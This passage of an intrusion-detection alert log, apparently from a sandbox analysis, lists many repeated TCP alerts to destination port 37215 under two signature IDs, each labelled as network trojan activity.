            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878618
            SID:2835222
            Source Port:48350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818573
            SID:2829579
            Source Port:40672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559742
            SID:2835222
            Source Port:48122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.774164
            SID:2829579
            Source Port:60648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575845
            SID:2829579
            Source Port:45634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070868
            SID:2829579
            Source Port:57708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857022
            SID:2829579
            Source Port:60512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861222
            SID:2829579
            Source Port:37496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932927
            SID:2829579
            Source Port:44384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067213
            SID:2835222
            Source Port:56280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.903935
            SID:2829579
            Source Port:46548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500071
            SID:2829579
            Source Port:38218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.772005
            SID:2835222
            Source Port:56532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870730
            SID:2835222
            Source Port:60034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486839
            SID:2829579
            Source Port:35458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.767009
            SID:2829579
            Source Port:41390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745553
            SID:2835222
            Source Port:34672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931661
            SID:2835222
            Source Port:49130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.054091
            SID:2829579
            Source Port:36002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754805
            SID:2835222
            Source Port:51790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809324
            SID:2835222
            Source Port:59114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805509
            SID:2829579
            Source Port:41920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979582
            SID:2829579
            Source Port:35268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945231
            SID:2829579
            Source Port:41872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857240
            SID:2829579
            Source Port:41924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436981
            SID:2835222
            Source Port:43362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877813
            SID:2829579
            Source Port:50222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434258
            SID:2829579
            Source Port:38336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779497
            SID:2835222
            Source Port:49718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.746438
            SID:2835222
            Source Port:53210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309277
            SID:2835222
            Source Port:49278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344280
            SID:2829579
            Source Port:47546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560061
            SID:2835222
            Source Port:58498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710011
            SID:2829579
            Source Port:34132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995912
            SID:2835222
            Source Port:53620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.539982
            SID:2835222
            Source Port:56810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879468
            SID:2835222
            Source Port:60960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676481
            SID:2829579
            Source Port:38930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313217
            SID:2829579
            Source Port:55266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.322519
            SID:2835222
            Source Port:44294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318202
            SID:2835222
            Source Port:45266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342292
            SID:2835222
            Source Port:46608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582033
            SID:2835222
            Source Port:53412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.558019
            SID:2829579
            Source Port:59608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.452349
            SID:2829579
            Source Port:36234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298644
            SID:2835222
            Source Port:45386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251881
            SID:2829579
            Source Port:45012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.021327
            SID:2835222
            Source Port:43744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350496
            SID:2835222
            Source Port:60804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060018
            SID:2829579
            Source Port:57166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870491
            SID:2829579
            Source Port:54834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336001
            SID:2829579
            Source Port:42560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735228
            SID:2835222
            Source Port:60750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687669
            SID:2835222
            Source Port:33384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988540
            SID:2835222
            Source Port:53252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739505
            SID:2835222
            Source Port:45386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312730
            SID:2835222
            Source Port:58646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989138
            SID:2829579
            Source Port:53654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.382989
            SID:2829579
            Source Port:35252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.069736
            SID:2835222
            Source Port:49916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381710
            SID:2835222
            Source Port:43586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864245
            SID:2829579
            Source Port:47446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777482
            SID:2829579
            Source Port:39966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107147
            SID:2835222
            Source Port:57608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808882
            SID:2835222
            Source Port:48512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900378
            SID:2835222
            Source Port:60248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071858
            SID:2835222
            Source Port:47138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990311
            SID:2829579
            Source Port:36906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825784
            SID:2835222
            Source Port:37854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891625
            SID:2835222
            Source Port:33882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067477
            SID:2835222
            Source Port:51198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014696
            SID:2835222
            Source Port:48686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898275
            SID:2835222
            Source Port:33704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998656
            SID:2829579
            Source Port:43310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.487751
            SID:2829579
            Source Port:37254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847640
            SID:2835222
            Source Port:39262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881267
            SID:2835222
            Source Port:51552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014779
            SID:2829579
            Source Port:58312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002403
            SID:2829579
            Source Port:34132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.377123
            SID:2829579
            Source Port:57652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834107
            SID:2835222
            Source Port:55046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917261
            SID:2835222
            Source Port:45406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912209
            SID:2835222
            Source Port:33550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070971
            SID:2835222
            Source Port:44046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507120
            SID:2829579
            Source Port:46372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883131
            SID:2829579
            Source Port:54428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772858
            SID:2829579
            Source Port:37794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.112231
            SID:2829579
            Source Port:49480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997850
            SID:2835222
            Source Port:55442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855363
            SID:2835222
            Source Port:55474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852182
            SID:2835222
            Source Port:50608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676630
            SID:2829579
            Source Port:53470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984784
            SID:2835222
            Source Port:60784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786508
            SID:2829579
            Source Port:40102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807463
            SID:2829579
            Source Port:33708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.966619
            SID:2835222
            Source Port:33370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993978
            SID:2829579
            Source Port:43324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180610
            SID:2835222
            Source Port:40028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767321
            SID:2835222
            Source Port:35634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425122
            SID:2829579
            Source Port:45882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929492
            SID:2829579
            Source Port:52540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070085
            SID:2829579
            Source Port:37114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776842
            SID:2835222
            Source Port:40692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067260
            SID:2835222
            Source Port:39038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519058
            SID:2829579
            Source Port:60684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507222
            SID:2829579
            Source Port:43198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.884782
            SID:2829579
            Source Port:35924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871793
            SID:2835222
            Source Port:37410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848892
            SID:2835222
            Source Port:34186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866872
            SID:2835222
            Source Port:34330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995584
            SID:2835222
            Source Port:53502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563490
            SID:2835222
            Source Port:56364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782327
            SID:2829579
            Source Port:49772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744736
            SID:2829579
            Source Port:54832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792464
            SID:2829579
            Source Port:37746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839613
            SID:2829579
            Source Port:39718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059707
            SID:2835222
            Source Port:33312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:07.000392
            SID:2835222
            Source Port:37586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.870877
            SID:2829579
            Source Port:43430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058107
            SID:2829579
            Source Port:57388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920011
            SID:2829579
            Source Port:49236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.950997
            SID:2835222
            Source Port:42540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.294961
            SID:2829579
            Source Port:48316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848213
            SID:2835222
            Source Port:46568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068479
            SID:2835222
            Source Port:51338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074959
            SID:2829579
            Source Port:43136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.750508
            SID:2829579
            Source Port:35078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734242
            SID:2829579
            Source Port:41630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334286
            SID:2835222
            Source Port:45046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.088818
            SID:2835222
            Source Port:45778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771840
            SID:2835222
            Source Port:34530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969130
            SID:2835222
            Source Port:35794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810086
            SID:2829579
            Source Port:49596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596800
            SID:2835222
            Source Port:39944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.414181
            SID:2835222
            Source Port:60230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.937107
            SID:2829579
            Source Port:35692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663940
            SID:2835222
            Source Port:41176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687712
            SID:2829579
            Source Port:43624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853282
            SID:2829579
            Source Port:35096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067606
            SID:2835222
            Source Port:36088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506977
            SID:2829579
            Source Port:35014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810350
            SID:2835222
            Source Port:49122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309254
            SID:2835222
            Source Port:49316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352221
            SID:2835222
            Source Port:46072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743423
            SID:2835222
            Source Port:55110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776929
            SID:2835222
            Source Port:56268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773068
            SID:2835222
            Source Port:58566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864601
            SID:2835222
            Source Port:42280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026420
            SID:2835222
            Source Port:37760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746372
            SID:2835222
            Source Port:47838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818769
            SID:2829579
            Source Port:39332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957070
            SID:2835222
            Source Port:36804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059994
            SID:2829579
            Source Port:35532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875315
            SID:2829579
            Source Port:44532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582779
            SID:2835222
            Source Port:47312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.741882
            SID:2835222
            Source Port:44094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946337
            SID:2829579
            Source Port:51898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818288
            SID:2829579
            Source Port:40264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.542671
            SID:2829579
            Source Port:34356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014573
            SID:2829579
            Source Port:37594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.628139
            SID:2829579
            Source Port:48064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824989
            SID:2835222
            Source Port:41868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862617
            SID:2835222
            Source Port:60688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913511
            SID:2829579
            Source Port:44148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985684
            SID:2829579
            Source Port:36828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543396
            SID:2835222
            Source Port:43606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757530
            SID:2829579
            Source Port:32902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.526052
            SID:2835222
            Source Port:51084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278358
            SID:2829579
            Source Port:36630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.950980
            SID:2835222
            Source Port:59314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374168
            SID:2835222
            Source Port:42112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.977112
            SID:2835222
            Source Port:55838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.665894
            SID:2829579
            Source Port:48032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765694
            SID:2829579
            Source Port:32956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068454
            SID:2829579
            Source Port:55840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780574
            SID:2829579
            Source Port:35570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299675
            SID:2829579
            Source Port:41140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.966665
            SID:2829579
            Source Port:47330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759943
            SID:2829579
            Source Port:46232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222036
            SID:2829579
            Source Port:60796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.307559
            SID:2835222
            Source Port:42644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.057972
            SID:2835222
            Source Port:48960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925417
            SID:2829579
            Source Port:39338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848339
            SID:2829579
            Source Port:52100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986442
            SID:2835222
            Source Port:51270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899443
            SID:2829579
            Source Port:35218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532882
            SID:2835222
            Source Port:59594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808360
            SID:2829579
            Source Port:44828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731394
            SID:2829579
            Source Port:52552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735711
            SID:2829579
            Source Port:48466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864926
            SID:2829579
            Source Port:49922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639926
            SID:2829579
            Source Port:55688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811913
            SID:2835222
            Source Port:58266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290841
            SID:2829579
            Source Port:53992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.006547
            SID:2829579
            Source Port:38924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.650192
            SID:2829579
            Source Port:49166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899334
            SID:2835222
            Source Port:36448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
